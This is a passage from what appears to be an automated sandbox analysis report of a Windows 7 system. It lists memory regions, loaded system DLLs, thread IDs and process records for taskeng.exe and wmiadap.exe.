"\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 4309 start_va = 0x7fef6e00000 end_va = 0x7fef6e18fff entry_point = 0x7fef6e00000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 4310 start_va = 0x7fef6fc0000 end_va = 0x7fef6fcffff entry_point = 0x7fef6fc0000 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 4311 start_va = 0x7fef6fd0000 end_va = 0x7fef6fe1fff entry_point = 0x7fef6fd0000 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 4312 start_va = 0x7fef7190000 end_va = 0x7fef71f3fff entry_point = 0x7fef7190000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 4313 start_va = 0x7fef7200000 end_va = 0x7fef7270fff entry_point = 0x7fef7200000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 4314 start_va = 0x7fef8a90000 end_va = 0x7fef8aa8fff entry_point = 0x7fef8a90000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 4315 start_va = 0x7fef8ab0000 end_va = 0x7fef8ac4fff entry_point = 0x7fef8ab0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 4316 start_va = 0x7fef8b10000 end_va = 0x7fef8b8bfff entry_point = 0x7fef8b10000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 4317 start_va = 0x7fef9660000 end_va = 0x7fef9677fff entry_point = 0x7fef9660000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 4318 start_va = 0x7fef9680000 end_va = 0x7fef9690fff entry_point = 0x7fef9680000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 4319 start_va = 0x7fef96b0000 end_va = 0x7fef9702fff entry_point = 0x7fef96b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4320 start_va = 0x7fef97e0000 end_va = 0x7fef97e9fff entry_point = 0x7fef97e0000 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 4321 start_va = 0x7fefb590000 end_va = 0x7fefb59afff entry_point = 0x7fefb590000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 4322 start_va = 0x7fefb670000 end_va = 0x7fefb67afff entry_point = 0x7fefb670000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4323 start_va = 0x7fefb680000 end_va = 0x7fefb6a6fff entry_point = 0x7fefb680000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4324 start_va = 0x7fefb6b0000 end_va = 0x7fefb716fff entry_point = 0x7fefb6b0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 4325 start_va = 0x7fefb740000 end_va = 0x7fefb74bfff entry_point = 0x7fefb740000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 4326 start_va = 0x7fefb800000 end_va = 0x7fefb814fff entry_point = 0x7fefb800000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 4327 start_va = 0x7fefbc10000 end_va = 0x7fefbc17fff entry_point = 0x7fefbc10000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 4328 start_va = 0x7fefc080000 end_va = 0x7fefc097fff entry_point = 0x7fefc080000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 4329 start_va = 0x7fefcd50000 end_va = 0x7fefcd5bfff entry_point = 0x7fefcd50000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 4330 start_va = 0x7fefce20000 end_va = 0x7fefce26fff entry_point = 0x7fefce20000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 4331 start_va = 0x7fefcf10000 end_va = 0x7fefcf2afff entry_point = 0x7fefcf10000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 4332 start_va = 0x7fefcf30000 end_va = 0x7fefcf4dfff entry_point = 0x7fefcf30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4333 start_va = 0x7fefd080000 end_va = 0x7fefd089fff entry_point = 0x7fefd080000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 4334 start_va = 0x7fefd180000 end_va = 0x7fefd1c6fff entry_point = 0x7fefd180000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4335 start_va = 0x7fefd2a0000 end_va = 0x7fefd2fafff entry_point = 0x7fefd2a0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4336 start_va = 0x7fefd410000 end_va = 0x7fefd416fff entry_point = 0x7fefd410000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 4337 start_va = 0x7fefd420000 end_va = 0x7fefd474fff entry_point = 0x7fefd420000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4338 start_va = 0x7fefd480000 end_va = 0x7fefd496fff entry_point = 0x7fefd480000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4339 start_va = 0x7fefda20000 end_va = 0x7fefda2afff entry_point = 0x7fefda20000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 4340 start_va = 0x7fefda50000 end_va = 0x7fefda74fff entry_point = 0x7fefda50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4341 start_va = 0x7fefda80000 end_va = 0x7fefda8efff entry_point = 0x7fefda80000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4342 start_va = 0x7fefda90000 end_va = 0x7fefdb20fff entry_point = 0x7fefda90000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 4343 start_va = 0x7fefdb70000 end_va = 0x7fefdb83fff entry_point = 0x7fefdb70000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 4344 start_va = 0x7fefdb90000 end_va = 0x7fefdb9efff entry_point = 0x7fefdb90000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4345 start_va = 0x7fefdd60000 end_va = 0x7fefddcafff entry_point = 0x7fefdd60000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4346 start_va = 0x7fefdf60000 end_va = 0x7fefdfc6fff entry_point = 0x7fefdf60000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4347 start_va = 0x7fefed60000 end_va = 0x7fefed8dfff entry_point = 0x7fefed60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4348 start_va = 0x7fefee30000 end_va = 0x7fefee7cfff entry_point = 0x7fefee30000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4349 start_va = 0x7feff0e0000 end_va = 0x7feff1bafff entry_point = 0x7feff0e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4350 start_va = 0x7feff1c0000 end_va = 0x7feff1defff entry_point = 0x7feff1c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4351 start_va = 0x7feff1e0000 end_va = 0x7feff2e8fff entry_point = 0x7feff1e0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4352 start_va = 0x7feff4d0000 end_va = 0x7feff598fff entry_point = 0x7feff4d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 4353 start_va = 0x7feff5a0000 end_va = 0x7feff63efff entry_point = 0x7feff5a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4354 start_va = 0x7feff640000 end_va = 0x7feff6b0fff entry_point = 0x7feff640000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4355 start_va = 0x7feff860000 end_va = 0x7feff86dfff entry_point = 0x7feff860000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 4356 start_va = 0x7feff9a0000 end_va = 0x7feffa38fff entry_point = 0x7feff9a0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4357 start_va = 0x7feffa40000 end_va = 0x7feffc42fff entry_point = 0x7feffa40000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4358 start_va = 0x7feffc50000 end_va = 0x7feffd7cfff entry_point = 0x7feffc50000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4359 start_va = 0x7feffd80000 end_va = 0x7feffe56fff entry_point = 0x7feffd80000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4360 start_va = 0x7feffec0000 end_va = 0x7feffec7fff entry_point = 0x7feffec0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4361 start_va = 0x7fefff60000 end_va = 0x7fefff60fff entry_point = 0x7fefff60000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4362 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 4363 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 4364 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 4365 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 4366 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 4367 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 4368 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 4369 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 4370 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 4371 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 4372 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4373 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 4374 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 4375 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 4376 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 210 os_tid = 0xb6c Thread: id = 211 os_tid = 0xa28 Thread: id = 212 os_tid = 0x574 Thread: id = 213 os_tid = 0x458 Thread: id = 214 os_tid = 0x424 Thread: id = 215 os_tid = 0x414 Thread: id = 216 os_tid = 0x7cc Thread: id = 217 os_tid = 0x7b4 Thread: id = 218 os_tid = 0x7a8 Thread: id = 219 os_tid = 0x7a4 Thread: id = 220 os_tid = 0x174 Thread: id = 221 os_tid = 0x178 Thread: id = 222 os_tid = 0x130 Thread: id = 223 os_tid = 0x118 Thread: id = 230 os_tid = 0x86c Thread: id = 236 os_tid = 0xa74 Thread: id = 243 os_tid = 0x7e8 Thread: id = 245 os_tid = 0x390 Thread: id = 247 os_tid = 0x538 Thread: id = 248 os_tid = 0x98c Thread: id = 249 os_tid = 0x898 Thread: id = 250 os_tid = 0x6e4 Thread: id = 251 os_tid = 0x80c Thread: id = 252 os_tid = 0x810 Thread: id = 275 os_tid = 0x8a4 Thread: id = 276 os_tid = 0x8b0 Thread: id = 278 os_tid = 0x5d0 Thread: id = 279 os_tid = 0xf0 Thread: id = 280 os_tid = 0x330 Thread: id = 283 os_tid = 0x674 Thread: id = 284 os_tid = 0x554 Thread: id = 374 os_tid = 0x524 Process: id = "33" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x75cdf000" os_pid = "0x5a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "created_scheduled_job" parent_id = "21" os_parent_pid = "0x980" cmd_line = "taskeng.exe {370CACBF-C376-4665-AF86-96A1EEBE08EE} S-1-5-21-2345716840-1148442690-1481144037-1000:YKYD69Q\\aETAdzjz:Interactive:Highest[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 286 os_tid = 0x22c Thread: id = 287 os_tid = 0xa3c Thread: id = 288 os_tid = 0x68c Thread: id = 289 os_tid = 0x5b0 Thread: id = 290 os_tid = 0x5ac Thread: id = 291 os_tid = 0x5a4 Process: id = "34" image_name = "wmiadap.exe" filename = "c:\\windows\\system32\\wbem\\wmiadap.exe" page_root = "0x7ae02000" os_pid = "0x6f4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x36c" cmd_line = "wmiadap.exe /F /T /R" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d435" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 4821 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4822 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4823 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4824 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 4825 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4826 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4827 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4828 start_va = 0xffe00000 end_va = 0xffe2ffff entry_point = 0xffe00000 region_type = mapped_file name = "wmiadap.exe" filename = "\\Windows\\System32\\wbem\\WMIADAP.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiadap.exe") Region: id = 4829 start_va = 0x7fefff60000 end_va = 0x7fefff60fff entry_point = 0x7fefff60000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4830 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4831 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 4832 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4833 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 4834 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x77b20000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4835 start_va = 0x7fefdd60000 end_va = 0x7fefddcafff entry_point = 0x7fefdd60000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4836 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4837 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4838 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4839 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 4840 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4841 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 4842 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4843 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 4844 start_va = 0x480000 end_va = 0x607fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 4845 start_va = 0x610000 end_va = 0x790fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4846 start_va = 0x7a0000 end_va = 0x85ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 4847 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x77a20000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4848 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4849 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4850 start_va = 0x7fef9270000 end_va = 0x7fef9296fff entry_point = 0x7fef9270000 region_type = mapped_file name = "loadperf.dll" filename = "\\Windows\\System32\\loadperf.dll" (normalized: "c:\\windows\\system32\\loadperf.dll") Region: id = 4851 start_va = 0x7fefbcd0000 end_va = 0x7fefbd55fff entry_point = 0x7fefbcd0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 4852 start_va = 0x7fefdf60000 end_va = 0x7fefdfc6fff entry_point = 0x7fefdf60000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4853 start_va = 0x7fefed60000 end_va = 0x7fefed8dfff entry_point = 0x7fefed60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4854 start_va = 0x7fefee30000 end_va = 0x7fefee7cfff entry_point = 0x7fefee30000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4855 start_va = 0x7feff0e0000 end_va = 0x7feff1bafff entry_point = 0x7feff0e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4856 start_va = 0x7feff1c0000 end_va = 0x7feff1defff entry_point = 0x7feff1c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4857 start_va = 0x7feff1e0000 end_va = 0x7feff2e8fff entry_point = 0x7feff1e0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4858 start_va = 0x7feff4d0000 end_va = 0x7feff598fff entry_point = 0x7feff4d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 4859 start_va = 0x7feff5a0000 end_va = 0x7feff63efff entry_point = 0x7feff5a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4860 start_va = 0x7feff860000 end_va = 0x7feff86dfff entry_point = 0x7feff860000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 4861 start_va = 0x7feffa40000 end_va = 0x7feffc42fff entry_point = 0x7feffa40000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4862 start_va = 0x7feffc50000 end_va = 0x7feffd7cfff entry_point = 0x7feffc50000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4863 start_va = 0x7feffd80000 end_va = 0x7feffe56fff entry_point = 0x7feffd80000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4864 start_va = 0x7feffec0000 end_va = 0x7feffec7fff entry_point = 0x7feffec0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5063 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 5064 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 5065 start_va = 0x880000 end_va = 0x8fffff entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 5066 start_va = 0x920000 end_va = 0x99ffff entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 5067 start_va = 0xa30000 end_va = 0xaaffff entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 5068 start_va = 0x7fefbf00000 end_va = 0x7fefbf0efff entry_point = 0x7fefbf00000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 5069 start_va = 0x7fefda80000 end_va = 0x7fefda8efff entry_point = 0x7fefda80000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 5070 start_va = 0x7feff9a0000 end_va = 0x7feffa38fff entry_point = 0x7feff9a0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 5071 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 5072 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 5073 start_va = 0xbf0000 end_va = 0xc6ffff entry_point = 0x0 region_type = private name = 